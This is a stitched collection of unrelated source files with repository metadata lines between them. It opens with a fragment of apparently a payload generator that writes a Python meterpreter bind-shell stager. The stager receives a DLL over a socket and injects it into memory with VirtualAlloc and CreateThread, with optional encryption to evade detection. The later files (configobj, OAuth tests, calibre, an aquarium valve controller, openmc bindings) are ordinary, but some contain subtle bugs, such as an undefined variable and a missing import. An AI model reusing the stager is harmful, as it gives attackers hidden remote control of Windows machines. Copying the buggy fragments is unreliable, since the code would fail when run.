payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketN
|
ame)
payload_code += "\t\t%s,_ = %s.acce
|
pt()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
|
kyclark/misc
|
tacc_manifest_upload/copy_from_manifest.py
|
Python
|
mit
| 1,866 | 0.001608 |
#!/usr/bin/env python3
import os
import sys
import re
import tempfile
from subprocess import run
from shutil import copyfile
args = sys.argv[1:]
in_dir = args[0] if len(args) == 1 else os.getcwd()
if not os.path.isabs(in_dir):
in_dir = os.path.abspath(in_dir)
if not os.path.isdir(in_dir):
print('"{}" is not a directory'.format(in_dir))
sys.exit(1)
work_dir = os.environ['WORK']
app_dir = re.sub(work_dir, '', in_dir)
if app_dir.startswith('/'):
app_dir = app_dir[1:]
app_base = os.path.split(app_dir)[0]
print('Looking in "{}"'.format(in_dir))
manifests = []
for root, _, filenames in os.walk(in_dir):
for filename in filenames:
if filename == 'MANIFEST':
manifests.append(os.path.join(root, filename))
num = len(manifests)
print('Found {} MANIFEST file{} in "{}"'.format(num, '' if num == 1 else 's', in_dir))
if num == 0:
sys.exit(1)
file_num = 0
tmp_dir = os.path.join(tempfile.mkdtemp(), app_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
for manifest in manifests:
man_dir = os.path.dirname(manifest)
print('Processing {}'.format(manifest))
for file in open(manifest):
|
file = file.rstrip()
path = re.sub('^\.', man_dir, file)
file_num += 1
print('{:3}: {}'.format(file_num, path))
if os.path.isfile(path):
filedir = os.path.dirname(re.sub(in_dir, '', path))
if filedir.startswith('/'):
filedir = filedir[1:]
partial = os.path.join(tmp_dir, filedir)
if not os.path.isdir(partial):
os.makedirs(partial)
copyfile(p
|
ath, os.path.join(partial, os.path.basename(file)))
dest = 'kyclark/applications/' + app_base
upload = '/home1/03137/kyclark/cyverse-cli/bin/files-upload'
run([upload, '-F', tmp_dir, dest])
print('Done, check "{}"'.format(dest))
|
theguardian/JIRA-APPy
|
lib/configobj/configobj.py
|
Python
|
gpl-2.0
| 89,640 | 0.003614 |
# configobj.py
# A config file reader/writer that supports nested sections in config files.
# Copyright (C) 2005-2014:
# (name) : (email)
# Michael Foord: fuzzyman AT voidspace DOT org DOT uk
# Nicola Larosa: nico AT tekNico DOT net
# Rob Dennis: rdennis AT gmail DOT com
# Eli Courtwright: eli AT courtwright DOT org
# This software is licensed under the terms of the BSD license.
# http://opensource.org/licenses/BSD-3-Clause
# ConfigObj 5 - main repository for documentation and issue tracking:
# https://github.com/DiffSK/configobj
import os
import re
import sys
from codecs import BOM_UTF8, BOM_UTF16, BOM_UTF16_BE, BOM_UTF16_LE
from lib.six import six
from _version import __version__
# imported lazily to avoid startup performance hit if it isn't used
compiler = None
# A dictionary mapping BOM to
# the encoding to decode with, and what to set the
# encoding attribute to.
BOMS = {
BOM_UTF8: ('utf_8', None),
BOM_UTF16_BE: ('utf16_be', 'utf_16'),
BOM_UTF16_LE: ('utf16_le', 'utf_16'),
BOM_UTF16: ('utf_16', 'utf_16'),
}
# All legal variants of the BOM codecs.
# TODO: the list of aliases is not meant to be exhaustive, is there a
# better way ?
BOM_LIST = {
'utf_16': 'utf_16',
'u16': 'utf_16',
'utf16': 'utf_16',
'utf-16': 'utf_16',
'utf16_be': 'utf16_be',
'utf_16_be': 'utf16_be',
'utf-16be': 'utf16_be',
'utf16_le': 'utf16_le',
'utf_16_le': 'utf16_le',
'utf-16le': 'utf16_le',
'utf_8': 'utf_8',
'u8': 'utf_8',
'utf': 'utf_8',
'utf8': 'utf_8',
'utf-8': 'utf_8',
}
# Map of encodings to the BOM to write.
BOM_SET = {
'utf_8': BOM_UTF8,
'utf_16': BOM_UTF16,
'utf16_be': BOM_UTF16_BE,
'utf16_le': BOM_UTF16_LE,
None: BOM_UTF8
}
def match_utf8(encoding):
return BOM_LIST.get(encoding.lower()) == 'utf_8'
# Quote strings used for writing values
squot = "'%s'"
dquot = '"%s"'
noquot = "%s"
wspace_plus = ' \r\n\v\t\'"'
tsquot = '"""%s"""'
tdquot = "'''%s'''"
# Sentinel for use in getattr calls to replace hasattr
MISSING = object()
__all__ = (
'DEFAULT_INDENT_TYPE',
'DEFAULT_INTERPOLATION',
'ConfigObjError',
'NestingError',
'ParseError',
'DuplicateError',
'ConfigspecError',
'ConfigObj',
'SimpleVal',
'InterpolationError',
'InterpolationLoopError',
'MissingInterpolationOption',
'RepeatSectionError',
'ReloadError',
'UnreprError',
'UnknownType',
'flatten_errors',
'get_extra_values'
)
DEFAULT_INTERPOLATION = 'configparser'
DEFAULT_INDENT_TYPE = ' '
MAX_INTERPOL_DEPTH = 10
OPTION_DEFAULTS = {
'interpolation': True,
'raise_errors': False,
'list_values': True,
'create_empty': False,
'file_error': False,
'configspec': None,
'stringify': True,
# option may be set to one of ('', ' ', '\t')
'indent_type': None,
'encoding': None,
'default_encoding': None,
'unrepr': False,
'write_empty_values': False,
}
# this could be replaced if six is used for compatibility, or there are no
# more assertions about items being a string
def getObj(s):
global compiler
if compiler is None:
import compiler
s = "a=" + s
p = compiler.parse(s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
class UnknownType(Exception):
pass
class Builder(object):
def build(self, o):
if m is None:
raise UnknownType(o.__class__.__name__)
return m(o)
def build_List(self, o):
return list(map(self.build, o.getChildren()))
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = next(i)
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
|
if o.name == 'None':
return None
if o.name == 'True':
return True
if o.name == 'False':
return False
# An undefined Name
raise UnknownType('Undefined Name')
def build_Add(self, o):
real, imag = list(map(self.build_Const,
|
o.getChildren()))
try:
real = float(real)
except TypeError:
raise UnknownType('Add')
if not isinstance(imag, complex) or imag.real != 0.0:
raise UnknownType('Add')
return real+imag
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_UnarySub(self, o):
return -self.build_Const(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build_Const(o.getChildren()[0])
_builder = Builder()
def unrepr(s):
if not s:
return s
# this is supposed to be safe
import ast
return ast.literal_eval(s)
class ConfigObjError(SyntaxError):
"""
This is the base class for all errors that ConfigObj raises.
It is a subclass of SyntaxError.
"""
def __init__(self, message='', line_number=None, line=''):
self.line = line
self.line_number = line_number
SyntaxError.__init__(self, message)
class NestingError(ConfigObjError):
"""
This error indicates a level of nesting that doesn't match.
"""
class ParseError(ConfigObjError):
"""
This error indicates that a line is badly written.
It is neither a valid ``key = value`` line,
nor a valid section marker line.
"""
class ReloadError(IOError):
"""
A 'reload' operation failed.
This exception is a subclass of ``IOError``.
"""
def __init__(self):
IOError.__init__(self, 'reload failed, filename is not set.')
class DuplicateError(ConfigObjError):
"""
The keyword or section specified already exists.
"""
class ConfigspecError(ConfigObjError):
"""
An error occured whilst parsing a configspec.
"""
class InterpolationError(ConfigObjError):
"""Base class for the two interpolation errors."""
class InterpolationLoopError(InterpolationError):
"""Maximum interpolation depth exceeded in string interpolation."""
def __init__(self, option):
InterpolationError.__init__(
self,
'interpolation loop detected in value "%s".' % option)
class RepeatSectionError(ConfigObjError):
"""
This error indicates additional sections in a section with a
``__many__`` (repeated) section.
"""
class MissingInterpolationOption(InterpolationError):
"""A value specified for interpolation was missing."""
def __init__(self, option):
msg = 'missing option "%s" in interpolation.' % option
InterpolationError.__init__(self, msg)
class UnreprError(ConfigObjError):
"""An error parsing in unrepr mode."""
class InterpolationEngine(object):
"""
A helper class to help perform string interpolation.
This class is an abstract base class; its descendants perform
the actual work.
"""
# compiled regexp to use in self.interpolate()
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
_cookie = '%'
def __init__(self, section):
# the Section instance that "owns" this engine
self.section = section
def interpolate(self, key, value):
# short-cut
if not self._cookie in value:
return value
def recursive_interpolate(key, value, section, backtrail):
"""The function that does the actual work.
``value``: the string we're trying to interpolate.
``section``: the section in which that string was found
``backtrail``: a dict to keep track of where we've been,
to detect and prevent infinite recursion loops
This is similar to a depth-first-search algorithm.
"""
# Have we been here already?
if (key, section.name) in backtrail:
# Yes - infinite loop detected
raise InterpolationLoopError(key)
# Place a marker on our backtrail so we won't come back here again
backtra
|
daafgo/Server_LRS
|
lrs/tests/OAuthTests.py
|
Python
|
apache-2.0
| 161,641 | 0.009385 |
import uuid
import json
import urllib
import os
import base64
import time
import string
import random
import oauth2 as oauth
from Crypto.PublicKey import RSA
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from ..views import reg_client, register, statements
from ..models import Activity, Agent
from oauth_provider.models import Consumer, Token, Nonce
from oauth_provider.utils import SignatureMethod_RSA_SHA1
# Django client uses testserver
TEST_SERVER = 'http://testserver'
INITIATE_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/initiate"
AUTHORIZATION_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/authorize"
TOKEN_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/token"
class OAuthTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
if not settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = True
# Create a user
self.user = User.objects.create_user('jane', 'jane@example.com', 'toto')
self.client.login(username='jane', password='toto')
#Register a consumer
self.name = "test jane client"
self.desc = "test jane client desc"
form = {"name":self.name, "description":self.desc}
self.client.post(reverse(reg_client),form)
self.consumer = Consumer.objects.get(name=self.name)
self.name2jane = "test jane client2"
self.desc2jane = "test jane client desc2"
form2jane = {"name":self.name2jane, "description":self.desc2jane}
self.client.post(reverse(reg_client),form2jane)
self.consumer2jane = Consumer.objects.get(name=self.name2jane)
self.client.logout()
self.jane_auth = "Basic %s" % base64.b64encode("%s:%s" % ('jane','toto'))
# Create a user
self.user2 = User.objects.create_user('dick', 'dick@example.com', 'lassie')
self.client.login(username='dick', password='lassie')
#Register a client
self.name2 = "test client2"
self.desc2 = "test desc2"
form2 = {"name":self.name2, "description":self.desc2}
self.client.post(reverse(reg_client),form2)
self.consumer2 = Consumer.objects.get(name=self.name2)
self.client.logout()
self.dick_auth = "Basic %s" % base64.b64encode("%s:%s" % ('dick','lassie'))
def tearDown(self):
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
# Delete everything
Token.objects.all().delete()
Consumer.objects.all().delete()
Nonce.objects.all().delete()
User.objects.all().delete()
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_pat
|
h, the_file)
try:
os.unlink(file_path)
except Exception, e:
raise e
def oauth_handshake(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce='', consumer=None):
# ============= INITIATE =============
if not request_nonce:
request_nonce = ''.join(random.choice(string.ascii_uppercase + string.digit
|
s) for _ in range(6))
if not consumer:
consumer = self.consumer
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (consumer.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
# Set scope
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
# Add non oauth params in query string or form
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# Make oauth request depending on where the parameters are
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Send request depending on the parameters
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
# Get request token (will be only token for that user)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token_secret = request_resp.content.split('&')[0].split('=')[1]
request_token = Token.objects.get(secret=token_secret)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
# Try to hit auth path, made to login
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
# Post data back to auth endpoint - should redirect to callback_url we set
|
sharad/calibre
|
src/calibre/ebooks/oeb/transforms/structure.py
|
Python
|
gpl-3.0
| 13,406 | 0.00358 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import re, uuid
from lxml import etree
from urlparse import urlparse
from collections import OrderedDict, Counter
from calibre.ebooks.oeb.base import XPNSMAP, TOC, XHTML, xml2text, barename
from calibre.ebooks import ConversionError
def XPath(x):
try:
return etree.XPath(x, namespaces=XPNSMAP)
except etree.XPathSyntaxError:
raise ConversionError(
'The syntax of the XPath expression %s is invalid.' % repr(x))
def isspace(x):
return not x or x.replace(u'\xa0', u'').isspace()
def at_start(elem):
' Return True if there is no content before elem '
body = XPath('ancestor-or-self::h:body')(elem)
if not body:
return True
body = body[0]
ancestors = frozenset(XPath('ancestor::*')(elem))
for x in body.iter():
if x is elem:
return True
if hasattr(getattr(x, 'tag', None), 'rpartition') and x.tag.rpartition('}')[-1] in {'img', 'svg'}:
return False
if isspace(getattr(x, 'text', None)) and (x in ancestors or isspace(getattr(x, 'tail', None))):
continue
return False
return False
class DetectStructure(object):
def __call__(self, oeb, opts):
self.log = oeb.log
self.oeb = oeb
self.opts = opts
self.log('Detecting structure...')
self.detect_chapters()
if self.oeb.auto_generated_toc or opts.use_auto_toc:
orig_toc = self.oeb.toc
self.oeb.toc = TOC()
self.create_level_based_toc()
if self.oeb.toc.count() < 1:
if not opts.no_chapters_in_toc and self.detected_chapters:
self.create_toc_from_chapters()
if self.oeb.toc.count() < opts.toc_threshold:
self.create_toc_from_links()
if self.oeb.toc.count() < 2 and orig_toc.count() > 2:
self.oeb.toc = orig_toc
else:
self.oeb.auto_generated_toc = True
|
self.log('Auto generated TOC with %d entries.' %
self.oeb.toc.count())
if opts.toc_filter is not None:
regexp = re.compile(opts.toc_filter)
for node in list(self.oeb.toc.iter()):
if not node.title or regexp.search(node.title) is not None:
self.log('Filtering', node.title if node.title else
'empty node', 'from TOC')
s
|
elf.oeb.toc.remove(node)
if opts.page_breaks_before is not None:
pb_xpath = XPath(opts.page_breaks_before)
for item in oeb.spine:
for elem in pb_xpath(item.data):
try:
prev = elem.itersiblings(tag=etree.Element,
preceding=True).next()
if (barename(elem.tag) in {'h1', 'h2'} and barename(
prev.tag) in {'h1', 'h2'} and (not prev.tail or
not prev.tail.split())):
# We have two adjacent headings, do not put a page
# break on the second one
continue
except StopIteration:
pass
style = elem.get('style', '')
if style:
style += '; '
elem.set('style', style+'page-break-before:always')
for node in self.oeb.toc.iter():
if not node.title or not node.title.strip():
node.title = _('Unnamed')
if self.opts.start_reading_at:
self.detect_start_reading()
def detect_start_reading(self):
expr = self.opts.start_reading_at
try:
expr = XPath(expr)
except:
self.log.warn(
'Invalid start reading at XPath expression, ignoring: %s'%expr)
return
for item in self.oeb.spine:
if not hasattr(item.data, 'xpath'):
continue
matches = expr(item.data)
if matches:
elem = matches[0]
eid = elem.get('id', None)
if not eid:
eid = u'start_reading_at_'+unicode(uuid.uuid4()).replace(u'-', u'')
elem.set('id', eid)
if u'text' in self.oeb.guide:
self.oeb.guide.remove(u'text')
self.oeb.guide.add(u'text', u'Start', item.href+u'#'+eid)
self.log('Setting start reading at position to %s in %s'%(
self.opts.start_reading_at, item.href))
return
self.log.warn("Failed to find start reading at position: %s"%
self.opts.start_reading_at)
def get_toc_parts_for_xpath(self, expr):
# if an attribute is selected by the xpath expr then truncate it
# from the path and instead return it as where to find the title text
title_attribute_regex = re.compile('/@([-\w]+)$')
match = title_attribute_regex.search(expr)
if match is not None:
return expr[0:match.start()], match.group(1)
return expr, None
def detect_chapters(self):
self.detected_chapters = []
self.chapter_title_attribute = None
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid chapter expression, ignoring: %s'%expr)
return []
if self.opts.chapter:
chapter_path, title_attribute = self.get_toc_parts_for_xpath(self.opts.chapter)
self.chapter_title_attribute = title_attribute
for item in self.oeb.spine:
for x in find_matches(chapter_path, item.data):
self.detected_chapters.append((item, x))
chapter_mark = self.opts.chapter_mark
page_break_before = 'display: block; page-break-before: always'
page_break_after = 'display: block; page-break-after: always'
c = Counter()
for item, elem in self.detected_chapters:
c[item] += 1
text = xml2text(elem).strip()
text = re.sub(r'\s+', ' ', text.strip())
self.log('\tDetected chapter:', text[:50])
if chapter_mark == 'none':
continue
if chapter_mark == 'rule':
mark = etree.Element(XHTML('hr'))
elif chapter_mark == 'pagebreak':
if c[item] < 3 and at_start(elem):
# For the first two elements in this item, check if they
# are at the start of the file, in which case inserting a
# page break in unnecessary and can lead to extra blank
# pages in the PDF Output plugin. We need to use two as
# feedbooks epubs match both a heading tag and its
# containing div with the default chapter expression.
continue
mark = etree.Element(XHTML('div'), style=page_break_after)
else: # chapter_mark == 'both':
mark = etree.Element(XHTML('hr'), style=page_break_before)
try:
elem.addprevious(mark)
except TypeError:
self.log.exception('Failed to mark chapter')
def create_level_based_toc(self):
if self.opts.level1_toc is not None:
self.add_leveled_toc_items()
def create_toc_from_chapters(self):
counter = self.oeb.toc.next_play_order()
for item, elem in self.detected_chapters:
text, href = self.elem_to_link(item, elem, self.chapter_title_attribute, counter)
self.oeb.toc.add
|
aquamonitor/Aquamonitor
|
rodi.py
|
Python
|
lgpl-3.0
| 4,109 | 0.011682 |
#!/usr/bin/python
import sys, signal, logging, time, RPi.GPIO as GPIO
FLOATSW_HIGH_WL = 26 # high water level float switch
WATER_VALVE = 10 # GPIO port for the Water Electo valve, High by default after boot
VALVE_CHGSTATE_TIMER = 25 # Electro valve needs roughly 20 seconds to switch from open to close and vice versa
logger = None
def Setup():
global logger
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/var/log/rodi.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s',"%Y-%m-%d %H:%M:%S")
handler.setFormatter(formatter)
logger.addHandler(handler)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(WATER_VALVE, GPIO.OUT)
GPIO.setup(FLOATSW_HIGH_WL, GPIO.IN, pull_up_down=GPIO.PUD_UP) #, initial = GPIO.HIGH)
if not sys.stdout.isatty():
sys.stderr = open('/var/log/rodi_stderr.log', 'a')
sys.stdout = open('/var/log/rodi_stdout.log', 'a')
def Alert(message):
global logger
logger.info(message) # log the event
print(message)
logger.handlers[0].flush()
def Close_valve():
GPIO.output(WATER_VALVE, False)
Alert("Closing the RO/DI valve")
def Open_valve():
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened")
sys.exit(5)
else:
Alert("Opening the RO/DI valve")
GPIO.output(WATER_VALVE, True)
time.sleep(VALVE_CHGSTATE_TIMER)
def Refilling():
if GPIO.input(WATER_VALVE) == True:
return True
else:
return False
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
if not len(sys.argv) > 1:
print("You must provide one numerical argument to this function (duration in seconds). Exiting.")
sys.exit(1)
if sys.argv[1] != "close" and sys.argv[1] != "stop"
|
and not sys.argv[1].isdigit():
print("Value is neither 'close', 'stop' or a refill duration expressed in seconds")
|
sys.exit(1)
i = 0
killer = GracefulKiller()
Setup()
if sys.argv[1] == "close" or sys.argv[1] == "stop":
Close_valve()
if str.count(subprocess.check_output(["ps", "aux"]), "rodi") > 1:
Alert("Warning, we were called while another instance of rodi.py was already in Memory")
sys.exit(1)
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump already high, refilling would be dangerous, exiting")
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened while high water in the sump, closing.")
Close_valve()
sys.exit(3)
if sys.argv[1].isdigit():
Alert("Not already refilling, sump water level normal, proceeding.")
Alert("Refilling for " + sys.argv[1] + " seconds")
try:
Open_valve()
while i<VALVE_CHGSTATE_TIMER+int(sys.argv[1]):
time.sleep(1)
i=i+1
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump is now high, stopping the refill")
Close_valve()
sys.exit(3)
break
if killer.kill_now:
Alert("Caught a Sigterm, Sigkill or CTRL+C, exiting.")
Close_valve()
sys.exit(2)
break
Alert("Refill done, exiting.")
Close_valve()
sys.exit(0)
except (RuntimeError, IOError):
Alert("Caught an exception, exiting.")
Close_valve()
sys.exit(4)
# Exit code :
# 5 : already refilling or cannot create lock file
# 4 : Caught an exception
# 3 : water is high either at start or during the refill
# 2 : a sigkill, sigterm or keyboard CTRL+C signal was received
# 1 : incorrect parameter received
# 0 : all went fine
|
miketheman/opencomparison
|
profiles/templatetags/profile_tags.py
|
Python
|
mit
| 137 | 0 |
from
|
django import template
register = template.Library()
@register.filter
def package_usage(user):
return user.package_set.a
|
ll()
|
mit-crpg/openmc
|
openmc/lib/filter.py
|
Python
|
mit
| 16,055 | 0.000561 |
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Tally functions
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.resttpe = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.resttpe = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
